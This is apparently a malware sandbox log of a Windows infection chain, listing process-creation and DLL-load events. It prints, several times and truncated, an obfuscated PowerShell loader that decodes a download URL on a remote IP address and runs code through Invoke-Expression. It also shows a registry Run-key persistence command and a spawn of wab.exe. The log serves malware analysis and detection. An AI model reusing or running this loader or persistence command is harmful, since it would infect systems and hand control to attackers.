Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Sneglefart.Glo && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "nyerhvervelsen" /t REG_EXPAND_SZ /d "%Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
